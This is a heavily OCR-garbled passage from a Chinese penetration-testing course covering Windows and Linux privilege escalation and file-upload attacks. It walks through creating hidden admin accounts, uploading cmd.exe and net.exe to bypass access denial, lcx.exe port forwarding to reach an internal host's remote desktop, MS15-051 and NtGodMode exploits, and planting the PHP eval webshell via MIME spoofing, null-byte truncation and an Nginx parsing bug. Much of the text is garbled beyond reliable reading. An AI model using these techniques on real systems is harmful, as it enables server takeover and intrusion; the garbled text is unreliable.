
它 又 是 确实 存在 的 ， 这 就 是 隐藏 用 户 的 一 个 小 技巧 。 


之 后 我 们 把 mst$ 添加 到 管理 员 组 中 ， 并 且 查 看 它 的 信息 ， 我 们 发 现 它 成 功 刚 添加 
到 了 管理 员 组 中 。 





现在 我 们 查看 远程 连接 的 端口 ， 首 先 执行 tasklist /svc ° + 
找 TermService 


IT M | CT mm Im 


MI 


eH EH 
a i 
roo E : 


Tr 
= 


SES 


E 


zs 4-4. 





我 们 看 到 它 的 PID 为 1504。 之 后 执行 netstat -ano 


: aphpStudy \WWW\\test> netstat 


h3 "rr rm 


M 
tj rp Tm 





寻找 PID A 1504 4% — 4r > TUF SIE 83$ wu x 3389 » 
需要 远程 连接 的 时 候 ， 输 入 刚刚 创建 的 用 户 名 和 和 需 码 就 可 以 了 。 


突破 限制 
假如 说 我 们 在 实际 情况 中 看 到 了 [Err] 拒 绝 访问 


npert com. ex 





那 我 们 可 以 找到 目 己 电脑 上 的 cmd.exe ， 然 后 上 传 上 去 。 上 比如 上 传 路 径 如 下 : 








C www.winexpert. com. Gt BEMLLLTNOGTEIOGTASNED OMEN NIE TEMPI M 





59. 188. 236. 22 目录 (382), 文件 (2754) Bi 时 间 大 小 属性 








end. exe 2016-07-30 21:15:16 647130 32 


c 


2015 zm asp 2015-01-14 1:26:59 311 


EN wew.winexpert. com. @ MD IT EI sat DS 








net user 还 是 拒绝 访问 的 ， 我 们 用 老 方法 ， 找 到 自己 电脑 中 的 net.exe ， 然 后 
传 上 去 。 之 后 执行 < 路 径 >\net .exe user 





可 以 看 到 突破 了 限制 。 


端口 转发 


在 提 权 过 程 中 ， 我 们 经 第 碰 到 这 样 的 情况 : 


D: \Projects \ReaderSrviapache-tomcat-T. 0. 2ü'webappzkRÜOTX? ipconfig 


Windows IP Configuration 


Ethernet adapter Local Area Connection: 


Lonnection-specific DNS Suffix . | 

Link-local IPv6 Address... . . : fe8D::dfl:Bes4:Baf 
LED GIU leg mw cams ame cum urbes bus FL 
aubnuek-Maehk-: une; fi ash Ces Wang ogg. 
Default Gateway : 192.166. 100. 1 


Tunnel adapter isatap. IUC3EGFE3-8TBC-43EE-O4II3- FDICCDDAA AFST : 


iue a State. . S Media disconnected 
Üonnection-speci £i c IHS: co PES 


Tunnel adapter Teredo Tunneling Pseudo-Interface: 


Conmection-specifiec IHS Suffix 

EPG: AE 22 ul umen | Ü. zu T101: 2080: 3d5B:3£5T.: Jbel 
Link-local IFv6 Address . . . . . : fe80:: 3fbT:S8ben*13 

Default Gateway BE 





我 们 可 以 看 到 WebShell 的 主机 处 于 内 网 网 下 ， 内 网 的 a 连接 别人 
但 别人 不 能 连接 它 ， 就 跟 连 接 路 由 器 的 个 人 电脑 差不多 


那么 这 种 情况 下 ， 我 们 就 而 楼 用 到 端口 转发 工具 lcx.exe ， 除 此 之 外 ， 还 需要 一 
台 拥 有 外 网 IP 的 主机 。 这 里 我 们 把 内 网 的 主机 叫做 肉鸡 ， 独 立 IP 主机 叫做 本 机 。 


将 lcx.exe 上 传 至 本 机 和 肉鸡 之 后 ， 首 先 确 定 本 机 的 IP 为 119.90.140.191 


| &5 119.90.140.191 - FRAMES 





—— ÓÉ— 


然后 我 们 在 本 机 执行 


lcx.exe -listen 51 3388 


es. CC: \WIRDOPS \system32\cead. ere — lez. exe -listen 51 


: Documents and Settings kudo$ NE Elex. exe -listen 51 3388 ka 
W RE 配合 使 用 。 DÉEARAUL EHEÜT -listen 51 3389, ÆA Fixfr-slavee 本 让 
51 Aip 3389 z | i 
AE a ptum. g.ignRIELEPpg35093389. 5 SE Se. V[-tran 51 127.8.8.1 


Listening port 51 
Listen OR? 
Listening port 3388 
Listen OR 
Waiting For Client on port:51 7 
J Accept a Glient on port 51 From 117.184.90.38 
Waiting another Client on port:3388.... 





这 条 命令 的 意思 就 是 说 ， 监 听 本 机 的 51 和 3388 端口 ， 并 将 两 个 端口 互相 转发 ， 
端口 51 的 入 境 流 量 发 给 端口 3388， 反 之 亦 然 。 其 中 51 是 用 于 内 鸡 连 接 的 端口 。 
3388 是 用 于 我 们 的 远程 连接 客户 端 连 接 的 端口 ， 为 了 避免 与 本 机 的 远程 连接 服务 
冲突 ， 选 择 了 3388。 大 家 可 以 自行 选择 其 他 未 占用 端口 。 


然后 我 们 在 肉鸡 上 执行 


lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389 





这 条 命令 连接 肉鸡 的 3389 端口 ， 和 本 机 的 51 端口 ， 并 互相 转发 。 


之 后 ， 我 们 在 本 机 或 其 他 主机 上 使 用 远程 连接 客户 端 ， 连 
接 119.90.140.191:3388 ， 可 以 看 到 lcx 中 显示 了 转发 的 信息 。 


T-s1aue E 


1z/.8.8.1 





Listening | 
Listen OKt 


Listening 4 RR f 


| Listen OR? 
] Waiting fo : 
Accept a Client on port 51 From 117.184.98.38 
| Waiting another Client on port:3388.... 
Accept a Client on port 3388 from 127.H.BH.1 
Accept Connect OK? 
start [Transmit (117.184.986.438 :5244H < IA PES HEEL, 


Hecu 43 bytes i2?7.8.86.1:2:3354 
Send 43 byte 117.184.90.38 -52446 





远程 连接 客户 端的 封包 会 发 给 主机 的 lox ， 之 后 会 发 给 肉鸡 的 Ilex ， 之 后 会 发 给 
肉鸡 的 远程 连接 服务 。 响 应 封包 会 按 原 路 返回 。 
等 待 一 会 儿 之 后 ， 我 们 成 功 连接 了 肉鸡 的 远程 果 面 : 


[9p 127.0.0.1: - 远程 点 面 


O Please wait for tl 





Windows Exp 提 权 


Exp 提 权 用 于 普通 方式 不 好 用 的 时 候 。 


n PL hd zn S drm 
aio EF AE SE TID 


pr 


=e 
i=]! 
n 
rm r= = 
nnl Er 
"123 3 


TRY) 
FH T 


P m pr 


ni 





我 们 可 以 看 到 它 安 装 了 147222 » 
然后 我 们 使 用 工具 ， 打 开 它 ， 主 界面 是 这 样 的 : 


漏洞 篇 dex 





Windows 


O #indows2003 C) #indows2008 O) Vindows2012 


请 将 补丁 己 复 制 到 这 在， 如 ， > 
[01]: KB2360937 


foal, KB24 78960 
[03]: KB2507938 
































米 斯 特 安全 攻防 洋 验 室 &N. S.T Lab 


我 们 选中 上 面 的 Windows 2003， 然 后 把 [01]: Q147222 复制 到 上 方 的 输入 框 
中 。 之 后 点 击 Search 
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漏洞 篇 提 权 








Windows 
@ Windows2003 (©) Windows2008 © Windows2012 


| HS10-084 a 
| KB2478960|Msii-014 P r3 
KB2507938 | MS11-056 | 
KB2566454 | MS11-062 | 
KB2646524 |MS12-003 | 
FE2645640 | MS12-009 
KB2641653|M512-018 
KB944653 | MSO7-067 
KE952004 |M509-012 PR 
KB971657 |MSO9-041 
KB2620712|MS11-097 

















KB2393802 |W511-011 | 
| F 
Bounce, Forward | 
SQL 
- UDF J MOF , Sh 
: I 
米 斯 特 安 全 攻防 实 对 





这 就 是 我 们 可 以 使 用 的 EXxp。 我 们 随便 选择 一 个 ， 比 如 MS15-051 。 我 们 可 以 在 课 
件 中 的 MS 提 权 集 

( 提 权 -扩大 战果 /扩大 战果 - 提 权 之 EXxp1Loit 提 权 & 上 帝 之 门 (Windows) .zip -> ms 提 权 : 
) 中 找到 它 。 

我 们 需要 根据 系统 的 版 本 来 选择 Exp， 这 里 系统 是 32 位 的 ， 我 们 就 应 该 先 
择 win32/32.exe 。 上 传 之 后 ， 我 们 可 以 使 用 dir 命令 在 目录 中 看 到 它 : 
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它 的 使 用 方法 是 <exp.exe> "«cmd 442" ， 例 如 ， 我 们 执行 net user 


Ld 


C: \phpStudy\WWwW> 22 .=x 





我 们 可 以 看 到 命令 执行 成 功 。 


E35 I] 


Err] Exp 用 于 开 尼 Windows “ERN” ^ PIEP ARAT Re CHS 
能 上 传 并 且 执 行 EXE 文件 。 使 用 方法 为 NtGodMode.exe [ONJ|OFF] 。 我 们 可 以 在 
课件 中 

( 提 权 -扩大 战果 /扩大 战果 - 提 权 之 Exploit 提 权 & 上 帝 之 门 (Windows).zip -> NtGodVM 
) 找到 它 。 


上 传 之 后 ， 执 行 NtGodMode .exe ON 





C: \phpS5tudđy XAWwWW» d 


lens C OOo en. 








然后 T ` E d Y MK = PEE 
到 通过 远程 连接 登录 目标 主机 ， 将 用 户 名 输入 为 admin ^ %41 
Z pi 


FAPS (WN): [admini strator 
密码 (PE): p 


M 


可 以 进入 目标 主机 。 





MEO) << 


漏洞 篇 提 权 





| X15 Lx 


管理 您 的 服务 器 





Be PELE AY IR E M E 
使 用 在 这 里 找到 的 工具 和 信息 来 添加 或 删除 角色 ， 并 执行 您 的 haat anne see 
日 常 管理 任务 。 


9 E 关 服 务 器 角色 的 信 





网 站 安全 狗 
(Apachehit) 


o) 阅 卖 关于 远程 管理 的 信息 
您 的 服务 器 已 经 用 下 列 角色 进行 了 配置 : 
a 应 用 程序 服务 器 


Web 程序 所 必须 的 核心 技术 。 应 用 
程序 服务 器 技术 包括 ASP.NET» COMt 和 Internet 信息 服 @ 阅 卖 关于 应 用 程序 服务 器 
$ (IIS). ”的 信息 


TT 2 0D 


注意 ， 必 须 是 输入 已 有 用 户 名 ， 不 存在 的 用 户 名 是 不 行 的 。 


Linux Exp 提 权 


首先 根据 uname -a 查看 内 核 版 本 ， 之 后 根据 内 核 版 本 找 Exp : 
名 称 E 


di 2.2.27 
li 2.2.x 
di 2.4 2.6 
2.4.17 
di 2.4.18 
2.4.19 
JA 2.4.20 
di 2421 
Jd 2.4.22 
J) 2.4.22-10 
di 2.4.23 
di 2.4.24 
di 2.4.25 
Ji 2.4.26 
di 2.4.27 
2.4.29 
Ji 2.4.34 
d 24x 


di 2.6.1-7 


之 后 我 们 执行 以 下 命令 来 编译 : 


n : exc SERO epa (5) 
= 服务 器 : HACKER-DSEC409B 
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gcc -pthread exp.c -o exp 


然后 执行 ./exp 来 执行 Exp。 我 们 一 开始 的 用 户 可 能 是 xxxQyyy ， 执 行 之 后 就 
变 成 了 root@yyy ， 这 样 就 算 提 权 成 功 。 
My 3K 


e XL AT XXI S—3) 28 
e Kali Linux 秘籍 第 七 草 权限 提升 
e CVE-2016-5195 hi +i iA 


RIG 4 PAIS SL 漏洞 篇 文件 上 传 


讲师 : ghOstkey 
整理 : 飞龙 
Wi: CC BY-NC-SA 4.0 
我 们 首先 看 一 下 文件 上 传 的 流程 图 。 





E15 9t [8] 


AF hi 
m 


-— 


其 中 ， 浏 览 器 通过 上 传 页 Ay 中 。 一 般 这 些 上 传 页 面 都 会 有 限制 
(比如 限制 格式 为 jpg/gif/png 等 等 ， 或 者 限制 文件 大 小 ) 。 


我 们 所 关注 的 这 个 上 传 页 面 ， 一 旦 限制 了 文件 就 可 能 导致 我 们 的 渗透 测试 失败 。 那 
么 趴 的 完全 失败 了 吗 ? 后面 会 讲 到 很 多 方法 ， 代 码 本 身 我 们 突破 不 了 ， 但 是 我 们 可 
以 用 这 些 方法 来 绕 过 限制 。 


漏洞 页 面 大 致 分 为 两 种 ， 一 种 是 不 限制 任何 格式 ， 每 意 上 传 ， 这 种 现在 比较 少 了 。 
zem BORA Content-type ， 虽 然 它 MET EAE ， 但 我 们 就 可 以 突破 它 。 





P ud 


— ats 


我 们 利用 文件 上 传 漏洞 的 目的 是 拿 到 WebShell : p a tk Al a Md 权限 。 

一 句 话 是 指 <?php @eval($_POST['a']) ?> ， 其 中 $_POST 数组 中 的 名 称 通常 

2.24 ' CD 以 随意 更 改 。 如 果 服 务 器 存在 含有 这 个 代码 的 脚本 ; 我 们 就 可 以 访问 
> 并 传 入 我 们 想 要 的 代码 来 执行 。 


— 6 i& d AE 2 55 o e oS EHE GRADU» TERAIORR 
IL o HK: RERAN o TAR HAA PHP 的 动态 特性 ， 对 其 进行 混淆 和 变 


$ 我 们 使 用 菜刀 这 具 来 连接 和 管理 WebShell > 详细 的 使 用 方法 见 下 面 的 实 
Ag 分 


王 意 文件 上 传 
看 一 下 这 段 代码 : 


«form action="" method="POST" ENCTYPE-"multipart/form-data"» 
Ax bf: 
«input type-"file" name="userfile"> 
<input type="submit" value=" 提 交 "> 
</form> 
<?php 
if(!isset($ FILES['userfile'])) 
exit; 
echo "<pre>"; 
print r($ FILES); 
echo "«/pre»"; 
$uploaddir='upfile/'; 
$PreviousFile-$uploaddir.basename(Q$ FILES['userfile']['name']); 
if(move uploaded file(Q$ FILES['userfile']['tmp name'], $Previou 
sFile)) 
echo EF mY; 
else 
echo 'E##AK!': 


首先 是 一 个 文件 上 传 表单 ， 我 们 可 以 看 到 表单 中 多 了 一 个 enctype 属性 ， 是 因为 
文件 上 传 的 格式 和 之 前 不 一 样 ， 不 加 这 个 就 无 法 识别 了 。 


a a a A 吉 束 。 之 后 会 打印 出 文件 信 
区 ， 便 于 我 们 调试 。 o 之 后 将 上 传 文件 的 名 称 和 保存 上 传 文件 的 目录 拼接 ， 将 文件 从 
" 时 目录 移动 到 这 个 目录 。 最 后 输出 成 功 或 失败 信息 。 


其 保存 为 upfile.php 后 ， 我 们 首先 访问 它 并 尝试 上 传 一 个 文件 。 我 们 把 一 句 
: <?php @eval($_ poe a']) ?> € X 1.php ， 然 后 把 它 上 传 到 服务 器 。 


FAN localhost/upfile.ph x 
€ C D localhost/upfile.php 
H 应 用 C to-md = 实验 吧 Ô i 毒 秋 论 坛 Bea D Google 翻译 


点 这 里 上 传 文件 : [ESCH | 未 选择 任何 文件 dx 




















于 是 我 们 看 到 上 传 成 功 。 





T WN localhost/upfileph x \ | 





























€ C ||!3localhost/upfile.php 

=i 应 用 @to-md = 实验 吧 D ij 春 秋 论坛 图 看 爱 破 解 D Google 翻译 
点 这 里 上 传 文件 : EE | 未 选择 任何 文件 [dene 
Array 

( 


[userfile] => Array 


[name] => 1. php 

[type] => application/octet-stream 

[tmp name] => C:XUsers*asusMAppDataXLaocalXTempNphpAOF 1. tmp 
[error] => 0 

[size] => 27 


) 
meaner 


我 们 可 以 看 到 打印 出 的 文件 信息 ， 其 中 : 


e userfile 是 这 个 文件 在 数组 中 的 索引 ， 也 是 表单 中 的 文件 上 传输 入 框 的 名 
称 。 

name 有 是 这 个 文件 的 文件 名 。 

type <P CHARA o 

tmp name 是 这 个 文件 的 临时 完整 路 径 。 

error 是 错误 代码 。 

size 是 文件 大 小 。 


之 后 ， 党 试 直接 访问 所 上 传 的 文件 ， 发 现 访问 成 功 。 





EN localhost/upfile/1.; x ' 


& C D localhost/upfile/1.php 
s: 应 用 @to-md = S38 D Eeiz 


然后 我 们 就 可 以 拿 菜刀 连接 了 。 


i) localhost 





See & Google 翻译 





(cy n: ws 


v] ER | 





12T.0.0.1 AR (7), W (7) 名 称 
me C: (C phpMyAdmin 
日 Se D: z 
一 webshell 
日 om e 1 
(LÀ phpMyAdmin C love 
(CZ webshell (C lovel 
c tore c3 mysql 
I lovel PI 
(Ci mysql (C subject 
ca subject Co phpguestbook 
DD phpguestbook iz phpinfo.php 


Fil 1. php 


[2] loveloveNote. txt 
| test. php 

|a) 1. php 

|Z] 5. php 


(2) 16-07-01. log 


& 


时 间 

2016-06-25 01:49:36 
2016-06-25 01:50:04 
2016-06-26 16:19:16 
2016-06-26 22:55:34 
2016-06-28 23:49:54 
2016-06-30 18:11:06 
2016-07-01 11:42:06 
2013-05-09 20:56:36 
2014-02-27 23:02:20 
2016-06-26 16:38:24 
2016-06-30 16:02:48 
2016-07-01 19:11:00 
2016-07-01 19:23:20 


2016-07-01 18:29:14 


68000 


我 们 可 以 看 到 连接 成 功 ， 那 么 我 们 就 成 功 地 GetShell 了 » 


TIFA E IR i) 


如 果 upfile.php 的 内 容 变 成 这 样 : 


星期 一 2016-07-11 WAM 
日 [c] 站 点 类 列 
fj 默认 类 别 
i] Typel 


S 日 程 提醒 





«form action="" method="POST" enctype="multipart/form-data"> 
点 这 里 上 传 文件 : 
«input type-"file" name="userfile"> 
<input type="submit" value=" 提 交 "> 

</form> 

<?php 

if(!isset($ FILES['userfile'])) 
exit; 

echo "<pre>"; 

print r($ FILES); 

echo "</pre>"; 


if(@$_FILES['userfile']['type'] != "image/gif"){ 
echo "对 不 起 ， 我 们 只 允许 上 传 GIF 格 式 的 图 片 11"， 
exit; 

j 


$uploaddir-'upfile/'; 
$PreviousFile-$uploaddir.basename(Q0$ FILES['userfile']['name']); 
if(move uploaded file(Q$ FILES['userfile']['tmp name'], $Previou 
sFile)) 

echo "HRJ |": 
else 

echo "上 传 失败 |"， 


这 段 代码 多 出 来 的 东西 就 是 ， 它 首先 验证 了 文件 类 型 ， 如 果 是 gif 则 放 过 ， 不 是 
则 拦截 。 那 么 根据 multipart 编码 类 型 ， type 这 个 东西 在 浏览 器 生成 之 后 ， 是 
可 以 改 的 。 我 们 可 以 通过 Burp 拦截 并 修改 这 个 值 。 


首先 我 们 打开 Burp * EG E ANGE » iM] upfile.php 。 之 后 开启 拦截 模式 并 上 传 一 
个 文件 : 


我 们 拦截 之 后 ， 找 到 Content-Type ， 发 现 他 是 application/oct-stream ， 我 
们 把 它 改 成 image/gif ， 之 后 放行 (可 能 需要 多 次 ， 在 我 这 里 是 这 样 ) 。 


漏洞 篇 文件 上 传 


burp intruder repeater window about 


target proxy spider | scanner | intruder | repeater sequencer | decoder | comparer | options alerts 


intercept 


request to http//acalhast80 [127.0.0.1] 


raw params | headers hex 


FOST /upfile.php HTTP/1.1 
Host: localhost 
Proxy-Connection: keep-alive 
Content-Length: 224 
Cache-Control: max-acge-ü 
Origin: http: localhost 
Upgrade-Insecure-Redquests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOU64)] AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/51.0.2704.103 Safari/537.36 
WebpEitFormBoundaryBtMeesjcCaFIr:/za7càá 
hecept: text/html,application/xhtml-c-xml,application/xml:cdqz20.9,image/wehp,*/*:]-20.8 
Referer: http://localhost/upfile.php 
Accept-Encoding: gzip, deflate 
Accept-Lanquage: 2h-CHW, sh; q=-0.6 


WebEitFormBoundaryBfMHMeejCaFW?za"vci 
Content—-Disposition: form-data; name-"userfile"; filename-"l.php" 
Content-Type: application/octet-stream 


<?php Hevali$ POST['a']) 2- 
WebpkEitFormbBoundaryBfMesjCaFl7/za"7ci-- 


Ls od d | ü matches 
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漏洞 篇 文件 上 传 


burp intruder repeater window about 


target proxy spider | scanner | intruder | repeater sequencer | decoder | comparer | options alerts 


intercept | options 


requestto http//lacalhast80 [127.0.0.1] 


raw ' params headers hex 


POST /upfile.php HTTP/1.1 
Host: localhost 
Proxy-Connection: keep-alive 
Content-Length: 224 
Cache-Control: max-acge-ü 
Origin: http: localhost 
Upgrade-Insecure—-Requests: 1 
User-Agent: Mozilla/’5.0 (Windows NT 10.0; Woe?) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome /51.0.2704.103 Safari/537.36 
WebEitFormBoundar yktMee CaF zamei 
hecept: text/html, application xhtml+#ml, application/xml: q=0.9, imager webp, */*:q=0.8 
Referer: http://localhost/upfile.php 
Accept-Encoding: gzip, deflate 
Accept-Language: 2h-CHW, sh; q=-0.6 


WebEitFormBoundaryBfMHeejCaFW?za"vci 
Content—-Disposition: form-data; name-"userfile"; filename-"l.php" 
Content-Type: image/gif 


<?php Hevali$ POST['a']) 2- 
WebpkEitFormbBoundaryBfMesjCaFlW/za"7ci-- 


a | — se EUR 
然后 我 们 可 以 看 到 上 传 成 功 ， 上 传 目 录 中 出 现 了 我 们 上 传 的 文件 。 
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漏洞 篇 文件 上 传 








Wizard 
EN localhost/upfile.ph x V ' 
€ > C |D localhost/upfile.php dm 
全 应 用 @ to-md «= 实验 吧 中 二 秋 论 坛 BH Bsa Dy Google MF O 其 他 书签 
点 这 里 上 传 文件 : | 选择 文件 | 未 选择 任何 文件 | 提交 
Array 
( 


[userfile] => Array 
( 


[name] => 1.php 

[type] => image/gif 

[tmp name] => C:\Users\asus\AppData\Local \Temp\php760D. tmp 
[error] => 0 

[size] => 27 


) 
上 传 成 功 ! 


JURE EE 





set 主页 H= =a 管理 -0 


^ | > upfile vO #2 "upfi.. 2 
^ 

»t 快速 访问 
3 RE 
dm 桌面 
i 图 片 
- lpad-zh 
E mst 
| 待 处 理 
e 考研 





* yyy 


1.php 


f~ OneDrive 
m 这 台 
dg 视频 


de BR v 
1 -个 项 目 状态 : 让 ml 


文件 扩展 名 限制 (补充) 
现在 ， 我 们 把 upfile.php 改 成 这 样 : 
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«form actionz"" method="POST" enctype="multipart/form-data"> 
点 这 里 上 传 文件 : 
<input type-"file" name="userfile"> 
<input type="submit" value=" 提 交 "> 
</form> 
<?php 
function extname($s) 1 
$p = strrpos($s, '.'); 


if($p === false) 
return ''; 
else 
return substr($s, $p + 1); 
j 
if(!isset($ FILES['userfile'])) 


exit; 
echo "<pre>"; 
print r($ FILES); 
echo "</pre>"; 


if(extname(80$ FILES['userfile']['name']) != 'gif')( 
echo "对 不 起 ， 我 们 只 允许 上 传 GIF 格 式 的 图 片 11"， 
exit; 

上 


$uploaddir-'upfile/'; 
$PreviousFile-$uploaddir.basename(Q$ FILES['userfile']['name']); 
if(move uploaded file(Q$ FILES['userfile']['tmp name'], $Previou 
sFile)) 

echo "HRJ |": 
else 

echo "上 传 失败 1 "， 


我 们 看 到 之 前 的 文件 类 型 校 验 变 成 了 后 组 名 校 验 。 那 么 如 何 绕 过 呢 ? LK > AR BR 
务 器 都 可 以 使 用 00 截断 来 绕 过 。 原 理 和 是 这 样 ， 操 作 系 统 不 允许 文件 中 存在 空 字 符 
( 'NO' ) ， 所 以 保存 文件 时 会 发 生 截断 ， 只 保留 空 字符 前 面 的 东西 作为 文件 名 。 

但 是 后 端 程序 中 是 可 以 处 理 空 字符 的 。 例 如 ， 我 们 如 果 把 文件 名 改 

成 1.php\0.jpg ， 那 么 在 程序 中 ， 它 的 扩展 名 为 jpg ， 但 是 保存 之 后 ， 文 件 名 
为 1.php ， 从 而 达到 绕 过 的 目的 。 


Burp 的 实际 操作 实际 上 非常 简单 。 我 们 点 击 Intercept is on ， 关 闭 拦 规模 
式 ， 然 后 提交 文件 后 ， 点 击 Proxy 选项 卡 ， 可 以 找到 之 前 的 请 求 : 


漏洞 篇 文件 上 传 


burp intruder repeater window about 


request | response 
params | headers 


Referer: http://localhost/upfile.php 

Accept-Encoding: gzip, deflate, br 

Accept-Language: zh-CN, zh; q=0.86 

Cookie: CNZZDATALO0O0045945=14665573 67-1483 773 427-3 7C1463 773427 


WebEitFormBoundarvyXWTSEuSPBEmAjvHor 
Content-Disposition: form-data; name-"userfile"; filename="1.php" 
Content-Type: application/octet-stream 


<?php Beval[8 POST['a']) ?» 
WebEitFormBoundaryXWTSEuSPBmàAÀjvHor-- 





然后 我 们 右键 点 击 该 请 求 ， 然 后 点 击 Send to Repeater : 
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漏洞 篇 文件 上 传 


burp intruder repeater Window about 


http:z//localhostiupfile.php 
add item to scope 


spider fram here 
actively scan this item 
passively scan this item 


send to intruder 
NEN ORE 
to Pep ter | 


send to sequencer 


send to comparer (request) 


send to comparer (response) 


show response in browser 
shi Hex request in browser 
Referer: http://localhost/upfile.php 
Accept-Encoding: gzip, deflate, br ss cuisse died: å 
Accept-Language: zh-CN,zh:dq-0.B8 show new histor window 
Cookie: CNZZDATALOO0045945=14665573 67 
add comment 


WebFitFormBoundar yAWTSEuSPBmAly highlight 
Content-Disposition: form-data; name- 
Content-Type: application/octet-strea) delete this item 
clear histo 
<?php Beval[8 POST['a']) ?» y 

WebKitFormBoundaryXWTSEuSPBmàAjv, copy URL 


copy links in item 


save item 


| | $maiches 





可 以 在 Repeater 中 找到 我 们 的 请 求 。 
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漏洞 篇 文件 上 传 


burp intruder repeater Window about 


repeater | sequencer | decoder | comparer | options | alerts 


cancal host localhost | 


request 


params | headers hex 


Accept-Encoding: gzip, deflate, br 
Accept-Language: zh-CN, zh; q=0.6 
Cookie: CNZZDATALO00045945=146865573 67-1483 77342 7-S 7C1L463 773427 


WebEitFormBoundaryXWTSEuSPBmAjvHor 
Content-Disposition: form-data; name-"userfile"; filename-"l1.php[ 
Content-Type: application/octet-stream 


<?php BReval($ POST['a']) ?> 
WebEitFormBoundaryXWTSEuSPBmAÀjvHor-- 





我 们 在 上 图 的 1.php 后 面 添加 .gif ， 然 后 点 击 上 面 的 hex 选项 卡 。 找 到 刚刚 
添加 的 .gif ° 
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漏洞 篇 文件 上 传 


burp intruder repeater Window about 


target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 


host localhost | 
Bo — | C] use SSL 


z ps p! a 31 Bà pe ps | Br 33 Bà bz Br lod joa jd  perCiM83773427 
28 |a pd pa | pa | pa or les [62 (æ 59 4 6 B 2 [Wektor 
m fa k2 pr ps fe pi pi [2 fo fe [er fa fs e fs 39  mBomdep*WISK — 
5o p2 pa jn fea pe pe r (gn pa pa |43 fet fee [74 [e5 [PBmAMlorCone 
20 ie 4 pd 44 e 3 Jo ler 3 les 4 9 |e le Ba [20 _|ntDisposition: 
ac s —Br— [72 fea pa fea Jo ga — i — Bh — 120 je — i ea jes pa —fomdssnames — — 
zd pz ps 3 ls 2 |e [9 lsc [es 2 Bb 20 6 [69 lsc jes [userflesfle ^ 
2e le pi pd li Bd 22 Bi e Wo les 70 ge 57-89 6 —]22  name-1iphosif 
at jd a 3 lor le þa li le 74 d |54 | [o 5 Ba 20 |Conientiype | 
30 e1 0 yo lc li 3 pi 4 les le lee [at |e 53 74 55 [applicationfoce 
5 a pd 3 ja 2 les lr jd o loa li loa Bc x 0 jes ltsream<3ph — 





鼠标 拖 动 出 来 的 区 域 就 是 .gif ， 最 前 面 那 个 .的 十 六 进 制 是 2e ， 我 们 在 它 上 
面 反击 右键 。 
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漏洞 篇 文件 上 传 


send to spider 
do an active scan 

i send to intruder 
send to repeater 
send to sequencer 
send to comparer 
send to decoder 
requestin browser 
engagement tools 
change request method 
change body encoding 
copy 
copy URL 
copy to file 
paste from file 
save item 
save entire histary 
paste LIRL as request 


add to site map 


insert bytes ... 


insert string ... 
delete byte 
delete bytes ... 





我 们 点 击 insert byte ， 之 后 2e 的 格子 之 前 就 会 出 现 一 个 00 的 格子 。 
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漏洞 篇 文件 上 传 


burp intruder repeater Window about 


“eget | prow | spider | scanner | muder | Tepeater | sequencer | decoder | comparer options | sers 


host localhost | 
fso | | | use SSL 


S pu e er ja — [68 — Bd —Jomm-datar name= — — 
od a s y3 ps [72 e es — be 185 — pa — Bh —0 ps — R8 — Ec es  usede-Ne ——— —— 
2e | | d ls d 2 Bi ge yo les Vo pom 57 59 j6  name-"iphpji 
a 2 d a 43 lr le 4 55 lee 4 la 54 | ro jes [a [ContentType | 
30 o pi 0 lm sc les 53 ei 74 o B le Ja [ot 63 74 [application  — 
Bí fs va pd 3 Wa J2 ls5 Jj! d log fpa log a Bc B 70 letsveam<p — 


length: 





这 样 就 满足 了 我 们 的 要 求 ， 我 们 可 以 点 击 上 面 的 go 来 发 送 请 求 。 这 个 技巧 并 不 对 
所 有 服务 器 都 管用 ， 但 是 值得 一 试 。 
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«form action="" method="POST" enctype="multipart/form-data" name= 
"Fileform"> 
点 这 里 上 传 文件 : 
«input type-"file" name="userfile"> 
<input type="submit" value=" 提 交 "> 
</form> 
<script> 
function checkFile(e) { 
var file = document.forms.fileform.userfile.value; 
if(!file.endswith('.gif')) 
alert(' 对 不 起 ， 我 们 只 允许 上 传 GIF 格 式 的 图 片 11'); 
e.preventDefault(); 
j 
} 
document .addEventListener('DOMContentLoaded', function() { 
document.forms.fileform.onsubmit = checkFile; 
3): 
</script> 
<?php 
function extname($s) { 
$p = strrpos($s, '.'); 


if($p === false) 
return ''; 
else 
return substr($s, $p + 1); 
} 
if(!isset($ FILES['userfile'])) 


exit; 
echo "<pre>"; 
print r($ FILES); 
echo "</pre>"; 
$uploaddir-'upfile/'; 
$PreviousFile-$uploaddir.basename(Q$ FILES['userfile']['name']); 
if(move uploaded file(Q$ FILES['userfile']['tmp name'], $Previou 
sFile)) 
echo "ERJ |": 
else 
echo "上 传 失败 |"， 


dl 
我 们 可 以 看 到 ， 验 证 的 代码 移 到 了 前 端 ， 之 前 我 们 说 过 ， 前 端的 一 切 东 西 都 是 不 安 
全 的 ， 可 以 绕 过 。 我 们 只 需要 首先 上 传 一 张 正 第 图 片 ， 拿 Burp 抓 到 请 求 包 ， 之 后 
就 跟 “ 任 意 文件 上 传 ” 的 原理 一 样 了 ， 想 怎么 改 就 怎么 改 。 


这 里 面 要 注意 ， 如 果 你 在 前 端 看 到 了 文件 校 验 ， 那 么 程序 员 很 可 能 由 于 偷懒 而 没有 
在 后 端 添加 校 验 。 这 是 一 个 非常 显眼 的 漏洞 标志 。 


Nginx 解析 漏洞 


4o RIRF Be Nginx， 我 们 可 以 和 直接 上 传 图 片 格式 ， 利 用 解析 漏洞 拿 Webshell » 7& 
是 ， 由 于 Nginx 部 分 版 本 程序 自身 的 漏洞 ， 寻 致 可 以 解析 并 执行 非 脚本 文 


假设 存在 汤 洞 的 站 点 上 有 一 张 图 片 ，URL 地 址 为 


www.xxx.com/logo. jpg 


我 们 正 第 访问 时 ，Nginx 会 把 它 当 做 非 脚本 ， 直 接 读 取 并 传 给 客户 端 。 但 是 如 果 我 
们 这 样 访问 : 


www .Xxx.com/logo.jpg/a.php 


他 就 会 把 logo.jpg 当做 PHP 文件 来 执行 。 或 者 是 


www.xXxx.com/Logo. jpg%00.php 


也 会 导致 图 片 执行 ， 这 个 是 7 月 中 自爆 出 的 解析 漏洞 。 
要 利用 这 个 漏洞， 我 们 可 以 随便 找 一 张 图 片 ， 在 里 面 插入 一 名 话 


C:\Documents and Settings \Administrator\Sil\a. gif — Notepadtt 
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我 们 将 其 上 传 之 后 ， 访 问 图 片 的 URL， 确 认 上 传 成 功 


€ GQ @ Yr Ohttp;//xinzhbei.com/upload/a.gif | 


